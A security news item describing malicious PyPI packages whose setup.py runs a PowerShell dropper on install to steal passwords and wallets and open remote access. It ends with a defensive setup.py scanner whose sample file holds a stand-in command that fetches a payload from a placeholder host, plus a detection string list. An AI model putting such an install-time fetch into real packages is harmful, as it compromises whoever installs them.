These packages were discovered by Phylum between December 22 and December 31, 2022, and include pyrologin, easytimestamp, discorder, discord-dev, style.py, and pythonstyles. The packages have since been removed, so there is nothing to worry about.
Beware of Malicious PyPI Packages
For those wondering how this malware is deployed: the malicious code is concealed in the setup script (setup.py) of these libraries, so it runs as soon as a “pip install” command is executed. The malware is designed to launch a PowerShell script that retrieves a ZIP archive and installs invasive dependencies such as pynput, pydirectinput, and pyscreenshot. Describing these libraries, Phylum said: “These libraries allow one to control and monitor mouse and keyboard input and capture screen contents, saved passwords, and cryptocurrency wallet data from Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, Opera GX, and Vivaldi browsers.”

The person behind it also downloads and installs cloudflared, a command-line tool for Cloudflare Tunnel. The main idea is to remotely access the compromised machine via a Flask-based app: the attacker can run shell commands, download remote files and execute them on the host, exfiltrate files and entire directories, and even run arbitrary Python code.
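Because the dropper lives in setup.py and runs at install time, one defensive check is to scan a package's setup.py statically before installing it. The script below is an added example, not code from the article or from Phylum: it parses setup.py with the `ast` module, flags calls that spawn a shell or subprocess, and reports whether those calls carry PowerShell or download-URL strings. The sample setup.py it scans is constructed here and uses the placeholder host example.invalid.

```python
"""Static triage of a setup.py for install-time code execution (constructed example)."""
import ast

# Calls in a setup.py that run code at `pip install` time rather than declaring metadata.
EXEC_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "subprocess.check_output", "exec", "eval"}
# String fragments that suggest a dropper: spawning PowerShell or fetching a remote payload.
SUSPICIOUS_STRINGS = ("powershell", "http://", "https://", "cloudflared", "base64")


def _call_name(node):
    """Return a dotted name for a Call target, e.g. 'subprocess.run' (or '' if not simple)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return ""


def find_install_time_exec(source):
    """Return a list of (line, call name, matched suspicious strings) for flagged calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name not in EXEC_CALLS:
            continue
        # Collect every string literal used as an argument of the flagged call.
        literals = [n.value.lower() for n in ast.walk(node)
                    if isinstance(n, ast.Constant) and isinstance(n.value, str)]
        hits = sorted({s for s in SUSPICIOUS_STRINGS for lit in literals if s in lit})
        findings.append((node.lineno, name, hits))
    return findings


# Constructed sample setup.py mimicking the described pattern (placeholder URL, not real package code).
SAMPLE_SETUP_PY = '''
from setuptools import setup
import subprocess
subprocess.run(["powershell", "-c", "Invoke-WebRequest https://example.invalid/payload.zip"])
setup(name="demo", version="0.0.1")
'''

if __name__ == "__main__":
    for lineno, call, hits in find_install_time_exec(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {call}() with suspicious literals {hits}")
```

Run it against a package obtained with `pip download --no-deps --no-binary :all: <name>` (which fetches the sdist without executing setup.py) before deciding whether to install.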